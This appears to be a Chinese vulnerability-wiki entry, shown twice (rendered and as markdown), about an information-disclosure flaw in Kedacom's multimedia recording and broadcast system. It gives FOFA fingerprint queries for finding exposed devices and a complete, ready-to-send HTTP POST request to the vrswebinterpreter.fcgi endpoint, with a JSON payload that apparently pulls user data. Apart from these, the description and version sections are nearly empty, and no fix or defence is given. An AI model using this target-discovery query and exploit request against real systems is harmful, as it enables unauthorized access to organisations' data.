fofamini-wiki

登录白背景

源码

苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

一、漏洞简介

二、影响版本

多媒体录播系统

<font style="color:rgb(51, 51, 51);">三、资产测绘</font>

fofabody="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"
特征

四、漏洞复现

POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 333

{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}

原文: https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl

# 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

# 一、漏洞简介
苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

# 二、影响版本
多媒体录播系统

# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
+ fofa`body="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"`
+ 特征

![1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png](./img/VGSRQytOV8lBTDzI/1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65-816113.png)

# 四、漏洞复现
```plain
POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 333

{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}
```

![1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png](./img/VGSRQytOV8lBTDzI/1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1-343396.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl>